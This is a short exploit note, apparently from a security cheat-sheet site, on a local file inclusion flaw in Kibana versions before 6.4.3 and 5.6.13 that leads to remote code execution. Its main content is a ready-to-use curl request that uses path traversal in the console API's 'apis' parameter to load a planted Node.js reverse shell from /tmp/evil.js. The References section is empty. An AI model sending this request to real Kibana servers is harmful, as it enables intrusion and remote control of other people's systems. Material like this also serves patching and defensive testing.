Kibana LFI to RCE

kibana, exploit, rce

Overview #

Attacker can achieve RCE by including a node js reverse shell via LFI and RFI

Affected Versions #

Versions before 6.4.3 and 5.6.13.

Steps #

# this example assumes you have access inside the victim via file upload
# or any other means
curl 'http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/evil.js'

References #